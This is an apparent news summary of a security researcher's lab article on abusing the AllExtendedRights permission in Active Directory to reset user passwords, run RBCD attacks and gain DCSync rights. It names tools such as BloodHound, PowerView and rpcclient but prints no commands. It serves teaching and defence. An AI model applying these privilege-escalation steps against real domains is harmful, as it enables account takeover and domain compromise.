Exploitation of DACLs in Active Directory Environments
/ 3 min read
Quick take - The article by Pradnya Pawar explores the security risks associated with the exploitation of Discretionary Access Control Lists (DACL) in Active Directory environments, particularly focusing on the AllExtendedRights permission, and provides a lab setup for simulating attacks while emphasizing the importance of detection and mitigation strategies.
Fast Facts
- The article by Pradnya Pawar discusses the security risks associated with the AllExtendedRights permission in Active Directory, which can lead to privilege escalation and persistent access for attackers.
- It outlines a lab setup for simulating attacks using AllExtendedRights, mapping methods to the MITRE ATT&CK framework for better understanding of attack vectors.
- The AllExtendedRights permission allows users to read privileged attributes, reset passwords, and conduct Resource-Based Constrained Delegation (RBCD) attacks, enabling techniques like DCSync.
- The lab setup requires Windows Server 2019 and tools like Bloodhound and Powerview, demonstrating how an attacker can change a user’s password without knowing it.
- The article emphasizes the necessity for effective monitoring, detection, and response strategies to mitigate risks associated with AllExtendedRights exploitation.
Exploitation of Discretionary Access Control Lists in Active Directory Environments
Pradnya Pawar, an InfoSec researcher and Security Tech Lead, has published an article examining the exploitation of Discretionary Access Control Lists (DACL) through the AllExtendedRights permission in Active Directory environments. This permission is identified as a significant security risk, allowing attackers to escalate privileges, gain persistent access, and potentially take control of critical directory resources.
Lab Setup and Attack Simulation
The article provides a detailed lab setup designed to simulate attacks using the AllExtendedRights permission. It maps the methods used to the MITRE ATT&CK framework to enhance understanding of attack vectors. Detection mechanisms are outlined to identify suspicious activities related to AllExtendedRights attacks, emphasizing the necessity for effective monitoring and response strategies.
The AllExtendedRights permission grants extended rights, which are special permissions that allow users to read privileged attributes and perform specific actions within the Active Directory. Notably, this permission enables the resetting of passwords on User objects and facilitates Resource-Based Constrained Delegation (RBCD) attacks for Computer objects. If an attacker compromises a domain object with AllExtendedRights permissions, they can acquire DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges, enabling them to replicate objects from the Domain, a technique known as DCSync.
Setting Up the Active Directory Environment
The proposed lab setup requires Windows Server 2019 as the Active Directory environment. Kali Linux tools such as Bloodhound, Net RPC, Powerview, and BloodyAD are also prerequisites. The setup process involves creating two user accounts, Kavish and Geet, with the AllExtendedRights permission assigned to Geet for Kavish.
Steps for creating the Active Directory environment include installing Windows Server and promoting it to a Domain Controller. Setting up the domain and creating user accounts through specific commands are also part of the process. Once the AllExtendedRights privilege is assigned to Geet for Kavish, Geet gains the capability to change Kavish’s password without needing to know the current password. Tools like BloodHound can confirm Geet’s permissions.
Exploitation Methods and Security Recommendations
The exploitation method involves changing Kavish’s password using various tools and commands, including Linux Net RPC with Samba, BloodyAD, and the rpcclient tool on UNIX-like systems. Additionally, the Windows PowerShell’s Powerview module can be utilized for password changes via the Set-DomainUserPassword cmdlet.
The article underscores the critical importance of implementing detection and mitigation strategies, highlighting the need for organizations to strengthen their security postures against such threats.
Original Source: Read the Full Article Here
